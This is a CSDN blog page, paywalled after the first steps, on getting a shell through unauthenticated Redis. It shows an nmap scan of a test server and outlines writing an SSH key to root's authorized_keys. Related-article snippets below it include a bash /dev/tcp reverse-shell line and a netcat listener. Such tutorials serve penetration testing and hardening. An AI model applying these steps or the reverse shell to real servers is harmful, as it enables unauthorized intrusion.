redis未授权访问getshell

最新推荐文章于 2024-07-26 08:09:14 发布
最新推荐文章于 2024-07-26 08:09:14 发布
阅读量5.5k 收藏 5
点赞数
分类专栏: 漏洞 文章标签: redis getshell ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jiajiajiang_/article/details/81368212
版权
本文介绍了如何在Linux环境中,利用Redis未授权访问的漏洞,通过写入SSH公钥到目标服务器的root账户,实现无需密码的SSH登录。步骤包括使用nmap扫描端口,下载并安装Redis,将本地SSH公钥写入目标Redis缓冲区,修改Redis配置保存到指定路径,最后通过SSH无密登录。
摘要由CSDN通过智能技术生成

 

参考:https://blog.csdn.net/guxiaoguo/article/details/78913245

利用条件:linux,对方开启ssh

 

用到的工具:kali nmap redis

公司测试服务器:10.0.3.45

 

redis默认端口:6379

主要思路:利用redis未授权访问命令给root账户写入SSH公钥文件,然后通过SSH登录服务器

 

nmap扫描

使用命令:nmap -sV -p 1-65535 10.0.3.45

-sV 识别服务,很有用

-p 1-65535 全端口扫描

 

 

 

发现6379端口开启

若kali上没有redis,可以先利用wget下载下来,并解压,我这里用的是2.8.12

下载命令:wget http://download.redis.io/releases/redis-2.8.12.tar.gz

解压命令:tar -xzf redis-2.8.12.tar.gz

到所在目录中安装:make

<

最低0.47元/天 解锁文章
一支神经病
关注
专栏目录
redis 授权漏洞以及利用
BROTHERYY的博客
10-11 508
1.redis 介绍 REmote DIctionary Server(Redis) 是完全开源免费的,遵守BSD协议,Redis是一个由Salvatore Sanfilippo写的key-value存储系统。。 Redis 与其他的key - value 缓存产品有以下三个特点: 1.Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。 2.Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储。 3
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1988
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权访问
最新发布
h1008685的博客
07-26 1132
redis授权访问,危险的配置项,redis常用操作,redis漏洞环境配置,写入定时任务进行反弹连接,ssh密钥登录,redis写入公钥文件进行登录,redis漏洞寻找[公网]
Redis授权访问漏洞利用
weixin_53440207的博客
03-12 605
Redis授权访问漏洞利用
Redis授权访问利用
LiuSiXian的博客
07-14 732
Redis服务器:192.168.100.10攻击机:192.168.15.101。
Redis授权漏洞利用
tangshuangsss的专栏
01-04 634
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
Redis授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 2370
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
redis授权访问getshell的方式
居上
06-28 2043
redis简介 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库 端口:6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis授权访问 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red
Redis授权访问getshell》复现笔记(一)
limb0的博客
09-12 730
Redis授权访问getshell》复现笔记(一) 利用周末复现了一下Redis授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。 一、 环境介绍 靶机:CentOS 6.5 (点击下载) IP:192.168.17.140 攻击机:Win10(本机) IP:192.168.8.195 二、...
Redis授权访问getshell》复现笔记(二)
limb0的博客
09-16 508
Redis授权访问getshell》复现笔记(二) 复现完了写马getshell,我们再来复现一下利用crontab反弹shell: 使用nc.exe在攻击机上监听9999端口: nc –lvvp 9999 还是使用Redis Clinet写入如下命令 config set dir /var/spool/cron config set dbfilename root set xxx "\n...
Redis授权访问漏洞的利用
weixin_68681298的博客
07-26 264
bash -i >& /dev/tcp/192.168.142.44/7777 0>&1:打开一个交互式的bash终端,与远程机器建立一个socket连接将标准错误输出合并到标准输出中,将标准输入重定向到标准输出中。启动Redis服务:/usr/local/soft/redis-6.0.9/src/redis-server /usr/local/soft/redis-6.0.9/redis.conf。进入客户端:/usr/local/soft/redis-6.0.9/src/redis-cli。
redis授权访问漏洞的利用
2301_80127209的博客
11-16 169
redis服务(6379)端口对外开放且作密码认证时,任意用户可授权访问redis服务并操作获取其数据。攻击机:10.1.1.100 kali目标靶机:10.1.1.200。
关于Redis授权访问漏洞防范
RAYFUXK的专栏
09-17 801
【加固建议】 禁止Redis服务对公网开放,可通过修改redis.conf配置文件中的&quot;#bind 127.0.0.1&quot; ,去掉前面的&quot;#&quot;即可(Redis本来就是作为内存数据库,只要监听在本机即可); 设置密码访问认证,可通过修改redis.conf配置文件中的&quot;requirepass&quot; 设置复杂密码 (需要重启Redis服务才能生效); 对访问源IP进行访问控制,可在防火墙限定指定源ip才可..
redis授权访问利用汇总
今天是几号的博客
03-17 1246
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。
redis授权访问漏洞利用
weixin_53562844的博客
05-07 2205
redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APL,reids默认端口是6379。造成授权漏洞的原因是安全配置作限制,redis默认情况是空密码连接。 利用条件:redis <3.2 利用原理:redis绑定在0.0.0.0:6379,且没有进行添加安全策略,直接暴露在公网,默认是空密码,可以让攻击者免密码登录redis服务。 靶机:192.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值